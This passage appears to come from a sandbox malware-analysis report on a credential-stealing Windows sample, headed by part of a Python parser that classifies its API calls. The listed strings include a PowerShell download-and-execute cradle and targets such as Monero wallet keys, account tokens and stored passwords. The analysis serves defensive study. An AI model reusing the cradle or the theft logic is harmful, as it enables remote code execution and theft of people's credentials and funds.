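• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B0740D
• GetProcessHeap.KERNEL32(00000000,?), ref: 00B07452
• HeapFree.KERNEL32(00000000), ref: 00B07459
• task.LIBCPMTD ref: 00B07555
• String ID: Password
"""

if __name__ == "__main__":
    for record in (DOWNLOAD_RECORD, REGHUNT_RECORD):
        calls, strings = parse_record(record)
        for c in calls:
            print(f"{c.ref:08X}  {describe(c)}")
        print("capabilities:", sorted(capabilities(calls, strings)))
```

Run stand-alone it prints each call with its decoded arguments, e.g. `CreateFileA(00000000, GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 00000000, CREATE_ALWAYS, 00000080, 00000000)`, and labels the first record `download_to_disk` and the second `registry_password_hunt`. The same tables explain the other records on this page: the InternetOpenUrlA at 00B05011 passes 04000100, which decodes to INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE, and the RegOpenKeyExA calls at 00B176DD and 00B1775B pass 00020119, which is KEY_READ|KEY_WOW64_64KEY. Chain matching is deliberately order-sensitive but not adjacency-sensitive, because the report interleaves subcall lines with the function's own calls.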
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                  • lstrlen.KERNEL32(00000000), ref: 00B0BC9F
                    • Part of subcall function 00B18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B18E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00B0BCCD
                  • lstrlen.KERNEL32(00000000), ref: 00B0BDA5
                  • lstrlen.KERNEL32(00000000), ref: 00B0BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 50fb32668b001e3520d371e7d12f1a4e9283136ac7e01440264ee1b8539ee953
                  • Instruction ID: 89e172662b3309d876835808e5f204053336238e17134f0c7c57685b4040d54e
                  • Opcode Fuzzy Hash: 50fb32668b001e3520d371e7d12f1a4e9283136ac7e01440264ee1b8539ee953
                  • Instruction Fuzzy Hash: CCB17371911108ABDB04FBA4DD96EEE73BDAF14310F804598F506B6191EF347E89CB62
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 54f1a6a180a99d4cea2501d31182fca80d55bbdc5db326654c6018d403409fae
                  • Instruction ID: a7d6f33d6f6bc961b6540a61567b043b5c6e34846e14cbde2d1776904d64f1cf
                  • Opcode Fuzzy Hash: 54f1a6a180a99d4cea2501d31182fca80d55bbdc5db326654c6018d403409fae
                  • Instruction Fuzzy Hash: 50F03A34984309EFE3549FE8A90976C7B70FB06702F040199F709C63D0DA704E419BE6
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B04FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B04FD1
                  • InternetOpenA.WININET(00B20DDF,00000000,00000000,00000000,00000000), ref: 00B04FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B05011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B05041
                  • InternetCloseHandle.WININET(?), ref: 00B050B9
                  • InternetCloseHandle.WININET(?), ref: 00B050C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 367745569bbe20eaa8d75b55cdf8c21bc4246cd5b55550b43126985601f653f6
                  • Instruction ID: 535a3180619de73812b5cda365de7a27e886d9a0ac734eeef574cae12c782cab
                  • Opcode Fuzzy Hash: 367745569bbe20eaa8d75b55cdf8c21bc4246cd5b55550b43126985601f653f6
                  • Instruction Fuzzy Hash: 0C31F8B4A40218ABDB20CF54DC85BDDB7B4EB48704F5081D9FA09A7281D7706EC58FA9
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B18426
                  • wsprintfA.USER32 ref: 00B18459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B1847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B1848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B18499
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,011FD9D0,00000000,000F003F,?,00000400), ref: 00B184EC
                  • lstrlen.KERNEL32(?), ref: 00B18501
                  • RegQueryValueExA.ADVAPI32(00000000,011FDAF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00B20B34), ref: 00B18599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B18608
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B1861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: fb42f9997921626160cdef0b7e13227dbb6f77705401a5ce0356bc8bdb3a1698
                  • Instruction ID: b505994039278ddb52b37c9d7f5f3ea22ae54584441d0c8f6d5c5e48104eb98c
                  • Opcode Fuzzy Hash: fb42f9997921626160cdef0b7e13227dbb6f77705401a5ce0356bc8bdb3a1698
                  • Instruction Fuzzy Hash: 2D210775950228ABDB24DF54DC85FE9B3B8FB48700F40C1D9A609A6280DF716A86CFE4
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B176A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B176AB
                  • RegOpenKeyExA.ADVAPI32(80000002,011EBD58,00000000,00020119,00000000), ref: 00B176DD
                  • RegQueryValueExA.ADVAPI32(00000000,011FDA78,00000000,00000000,?,000000FF), ref: 00B176FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B17708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: ffa047f1c3f9edce7c54ecce58b90aa449065822ad1121b7e58a097f247160e2
                  • Instruction ID: 5566263740d1f64dfca7b354a26902d35376274a95f30e8ae8bbfca0a3f74168
                  • Opcode Fuzzy Hash: ffa047f1c3f9edce7c54ecce58b90aa449065822ad1121b7e58a097f247160e2
                  • Instruction Fuzzy Hash: 37014FB9A84308BBE700DFE8DC49FADB7BCEB49701F504095FA05D7291EA7499408F61
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B1773B
                  • RegOpenKeyExA.ADVAPI32(80000002,011EBD58,00000000,00020119,00B176B9), ref: 00B1775B
                  • RegQueryValueExA.ADVAPI32(00B176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00B1777A
                  • RegCloseKey.ADVAPI32(00B176B9), ref: 00B17784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 2362138fcc114d510f870bb7cf9764d17523a1d6ee5fa71f841dfeab5f47cb6f
                  • Instruction ID: af845f25f709cf5e47ca8ced284c6d234048d78f208d4d925073267f9e553381
                  • Opcode Fuzzy Hash: 2362138fcc114d510f870bb7cf9764d17523a1d6ee5fa71f841dfeab5f47cb6f
                  • Instruction Fuzzy Hash: E00144B9A80308BBE710DFE4DC49FAEB7B8EB44700F104195FA05E7281DA7059408F61
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                  • LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 6b006f8de7fbb57348413e8ce0e6621b14dd417e5e988f3cfc4476a11dd86799
                  • Instruction ID: bb795f31f56cb89904ab634c03d6a119db740863afb8459f1b83c3b179e97adf
                  • Opcode Fuzzy Hash: 6b006f8de7fbb57348413e8ce0e6621b14dd417e5e988f3cfc4476a11dd86799
                  • Instruction Fuzzy Hash: C731F874A40209EFDB14CF94C985BAEBBF5FF49350F108198E911A7390D774A941CFA1
                  APIs
                  • lstrcat.KERNEL32(?,011FDC28), ref: 00B147DB
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14801
                  • lstrcat.KERNEL32(?,?), ref: 00B14820
                  • lstrcat.KERNEL32(?,?), ref: 00B14834
                  • lstrcat.KERNEL32(?,011EB0E0), ref: 00B14847
                  • lstrcat.KERNEL32(?,?), ref: 00B1485B
                  • lstrcat.KERNEL32(?,011FD458), ref: 00B1486F
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B18D90: GetFileAttributesA.KERNEL32(00000000,?,00B01B54,?,?,00B2564C,?,?,00B20E1F), ref: 00B18D9F
                    • Part of subcall function 00B14570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B14580
                    • Part of subcall function 00B14570: RtlAllocateHeap.NTDLL(00000000), ref: 00B14587
                    • Part of subcall function 00B14570: wsprintfA.USER32 ref: 00B145A6
                    • Part of subcall function 00B14570: FindFirstFileA.KERNEL32(?,?), ref: 00B145BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 485dc7b5b113f3ddbcbb2cdaca246496093d2529866a7b319907c5d0d90ba4e3
                  • Instruction ID: b4ca9e36f27d1441d1a137a9153a433666fe4f5ae9e5f405e1a1c7f886adad22
                  • Opcode Fuzzy Hash: 485dc7b5b113f3ddbcbb2cdaca246496093d2529866a7b319907c5d0d90ba4e3
                  • Instruction Fuzzy Hash: 613171BA94030867DB14FBB0DC85EED73BCBB58700F8045D9B31996081EE74A7C98BA5
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B12D85
                  Strings
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00B12D04
                  • ')", xrefs: 00B12CB3
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00B12CC4
                  • <, xrefs: 00B12D39
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 1c5a11a7c1f987783231e994d9bd73e3cc687df6d6a82531461e7a5511890bd0
                  • Instruction ID: 2934d97566983950181b7e35bb3ec32d9084a681ba17749d08122bbca44e84eb
                  • Opcode Fuzzy Hash: 1c5a11a7c1f987783231e994d9bd73e3cc687df6d6a82531461e7a5511890bd0
                  • Instruction Fuzzy Hash: 2B41AD71D112089ADB14FFA0D991FDDB7B8AF14310F804199E116B6192DF747ACACF91
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B09F41
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: a0809c790c85ae3d25a74c78d3c9f1b14b55f613a4c3360beb16ea1806289fd6
                  • Instruction ID: 8192fa2eedbf2b3004d12bc8ed7c9a8c06cec65e8d0a653cf25e8428577a9169
                  • Opcode Fuzzy Hash: a0809c790c85ae3d25a74c78d3c9f1b14b55f613a4c3360beb16ea1806289fd6
                  • Instruction Fuzzy Hash: E7615D70A102089BDB24EFA4DC96FED77F9AF50300F408458F90A5F1D1EB706A46CB52
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,011FD718,00000000,00020119,?), ref: 00B140F4
                  • RegQueryValueExA.ADVAPI32(?,011FDD30,00000000,00000000,00000000,000000FF), ref: 00B14118
                  • RegCloseKey.ADVAPI32(?), ref: 00B14122
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14147
                  • lstrcat.KERNEL32(?,011FDC70), ref: 00B1415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 731a334f30e511164672e509e0e2833919e1f5584e26bb732fd30f326896ceef
                  • Instruction ID: 0a9142993a4080d69646280554e9ef927c6d6a0027bc21b0edc6807669e6f83b
                  • Opcode Fuzzy Hash: 731a334f30e511164672e509e0e2833919e1f5584e26bb732fd30f326896ceef
                  • Instruction Fuzzy Hash: B641DBB6D40208ABDB14EFA4DC46FFD377DAB48300F404998B615961C1EE755B888BF2
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 00B1696C
                  • sscanf.NTDLL ref: 00B16999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B169B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B169C0
                  • ExitProcess.KERNEL32 ref: 00B169DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 48df913dd22a43a4bf809243b5eb571123c75d1215eb8887585abc29330bff1b
                  • Instruction ID: cbdbc3727dcd333919696d7a8f5c54b5014a255bae01d8a894e5f104c2d40e15
                  • Opcode Fuzzy Hash: 48df913dd22a43a4bf809243b5eb571123c75d1215eb8887585abc29330bff1b
                  • Instruction Fuzzy Hash: EA21EA75D14208ABCF04EFE8D945AEEB7B5FF48300F04856AE406E3250EB345605CBA5
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,011EB818,00000000,00020119,?), ref: 00B17E5E
                  • RegQueryValueExA.ADVAPI32(?,011FD418,00000000,00000000,000000FF,000000FF), ref: 00B17E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00B17E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: a83d640789b6aa6ed70fe6a64289a4141be4f6d5e5b8c552f190125f931db89d
                  • Instruction ID: c2ceeddf64c0c189d396d7bc662cc7df561239ad6dec528b4ba5df22ed554df9
                  • Opcode Fuzzy Hash: a83d640789b6aa6ed70fe6a64289a4141be4f6d5e5b8c552f190125f931db89d
                  • Instruction Fuzzy Hash: 38113DB6A84305ABD710CF98DD49FABBBFCEB05710F104199F605E7280DB7458018BA1
                  APIs
                  • StrStrA.SHLWAPI(011FD8B0,?,?,?,00B1140C,?,011FD8B0,00000000), ref: 00B1926C
                  • lstrcpyn.KERNEL32(00D4AB88,011FD8B0,011FD8B0,?,00B1140C,?,011FD8B0), ref: 00B19290
                  • lstrlen.KERNEL32(?,?,00B1140C,?,011FD8B0), ref: 00B192A7
                  • wsprintfA.USER32 ref: 00B192C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 3c99a2306b15ae6a59ff727b323a82f268ede0f452704523b9e54ba0291e0519
                  • Instruction ID: 34f770ee2d24f9c4ceee603e69f80c7c25bbe9dd29aab6dc9a7c3fe69fbeb065
                  • Opcode Fuzzy Hash: 3c99a2306b15ae6a59ff727b323a82f268ede0f452704523b9e54ba0291e0519
                  • Instruction Fuzzy Hash: BB011E75540208FFCB04DFECC994EAE7BB9EF44354F108148F9498B304C631AA40DBA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B012B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B012BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B012D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B012F5
                  • RegCloseKey.ADVAPI32(?), ref: 00B012FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 6f49af939af380145631702f5f70addfffc28af504652e162f06778906bbc14c
                  • Instruction ID: db43cd5cb786b22e8b1ba0401823cd63ec2dec5875535e9f7c9b0c8433aa20bb
                  • Opcode Fuzzy Hash: 6f49af939af380145631702f5f70addfffc28af504652e162f06778906bbc14c
                  • Instruction Fuzzy Hash: 9701E1B9A40308BBDB14DFE4DC49FAEB7BCEB48705F108159FA05D7280D6759A018F61
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: a18dc697bd2fd42eff389578d8059fb4cc4cda773e8c09375236581b4b10ad8c
                  • Instruction ID: eb5253c89ef1407a887173fdcb7080459f22d2bbf802082b30182edc37a7b03a
                  • Opcode Fuzzy Hash: a18dc697bd2fd42eff389578d8059fb4cc4cda773e8c09375236581b4b10ad8c
                  • Instruction Fuzzy Hash: B341F67154075C5EDB228B248C84FFB7FF8DF45744F9444E8E98A86182D2719A84CF64
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B16663
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B16726
                  • ExitProcess.KERNEL32 ref: 00B16755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 95b9d9197f09d5b607147410671ded54f84ca3356ed01efd26a7daa4755f0143
                  • Instruction ID: 8371e34260a645b0dfd9a22bdbf32c4f90e05079218979da9775bbf633d9c8af
                  • Opcode Fuzzy Hash: 95b9d9197f09d5b607147410671ded54f84ca3356ed01efd26a7daa4755f0143
                  • Instruction Fuzzy Hash: 75312FB1C01218ABDB14EF54DD91FDE77B8AF04310F805189F209A6191DF746B89CFA6
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B20E28,00000000,?), ref: 00B1882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B18836
                  • wsprintfA.USER32 ref: 00B18850
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 7cd9aef5bb63d28dac76d10aa509022b24cf557d3617f684b8d33b354f6ba8d2
                  • Instruction ID: 247aefffd1fdb02932649c474c5145226fe577fcae2509847fc67621120ec729
